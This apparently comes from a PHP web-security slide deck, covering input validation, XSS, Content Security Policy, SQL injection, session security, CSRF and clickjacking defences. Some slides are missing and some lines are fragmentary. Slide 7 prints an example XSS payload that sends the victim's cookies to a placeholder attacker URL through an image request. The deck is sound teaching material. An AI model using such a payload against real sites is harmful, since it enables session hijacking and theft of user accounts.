This document discusses principles and techniques for web development security, including validating user input, protecting against cross-site scripting (XSS) and SQL injection, managing session security, preventing cross-site request forgery (CSRF) and clickjacking, and using tools like Arachni for security testing. The pillars of information security are listed as confidentiality, integrity and availability. User input should be validated and output escaped to protect against attacks.
2. Pillars of Information Security
Confidentiality
Integrity
Availability
rafaelmonteiro / web-development-security
3. Principles
Multiple Layer Security
Consider that each layer will eventually fail
Provide the minimum amount of information
required
rafaelmonteiro / web-development-security
4. Validate user input
Since HTTP requests can be manipulated client-side,
all user input must be validated.
rafaelmonteiro / web-development-security
5. Protection
PHP offers the extensions ctype and filter. In
addition, most frameworks implement some sort of
data sanitization.
PHP 7+ provides type declarations that allow you to
specify the expected type of parameters.
declare(strict_types = 1);
rafaelmonteiro / web-development-security
6. Cross-site scripting (XSS)
When a user-supplied script is stored and/or executed
by the application.
rafaelmonteiro / web-development-security
7. Example
Assuming that an application allows input via GET
method, a malicious attacker do this injection:
<script>
(New Image()).src = "http://attacker_url/?" + escape(document.c
</script>
rafaelmonteiro / web-development-security
10. Protection
only allows access to code from
the same origin (protocol/domain/port) of the
application, while allowing access to external files (a
lib such as , for example)
Filter user input ( , , )
Escape output ( , ,
)
Apply (default-src, img-src,
script-src) -> delete inline code
Same-origin Policy
JQuery
strip_tags filter_var preg_replace
htmlspecialchars htmlentities
filter_var
Content Security Policy
rafaelmonteiro / web-development-security
11. Testing the CSP
A report is created when related warnings are
generated by the application.
Content-Security-Policy-Report-Only
Report-uri /path/file.php
rafaelmonteiro / web-development-security
12. SQL Injection
Protection
Do not concatenate data (parameters) with SQL
queries
Validate user input
Use prepared statements
Escape characters
rafaelmonteiro / web-development-security
13. Status Management
Protection
Use HTTPS
Set secure and HttpOnly flags
Prevent XSS
Session ID
Store some distinctive user information in session
Detect session hijacking (token)
Use to hinder session the
Change
HSTS
rafaelmonteiro / web-development-security
15. Cross-site Request Forgery
(CSRF)
Caused by viruses, scam/phishing, malicious
site/redirect
Protection
Submit token
Do not use GET for operations involving data
manipulation (just a good practice, because POST
can also be manipulated)
rafaelmonteiro / web-development-security
16. Clickjacking
Attacker creates fake page and through requests to
the target site (usually via iframe), takes advantage
of the user session
Protection
header('X-FRAME-OPTIONS', 'DENY'); // or SAMEORIGIN
rafaelmonteiro / web-development-security